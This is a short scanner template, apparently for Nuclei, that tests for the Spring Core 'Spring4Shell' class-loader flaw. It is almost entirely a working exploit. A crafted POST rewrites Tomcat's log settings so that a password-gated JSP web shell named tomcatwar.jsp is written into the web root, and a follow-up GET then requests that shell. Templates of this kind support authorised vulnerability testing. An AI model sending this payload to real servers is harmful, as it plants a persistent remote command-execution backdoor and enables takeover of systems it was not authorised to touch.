id: SpringCorePoC

info:
  name: SpringCorePoC
  author: e1abrador
  severity: critical
  reference: https://github.com/e1abrador

requests:
  - raw:
    - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        suffix: %>//
        c1: Runtime
        c2: <% 
        DNT: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 762


        class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

    - |
        GET /tomcatwar.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Connection: close


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "404"
        part: body

      - type: word
        words:
          - "Not Found"
        part: body
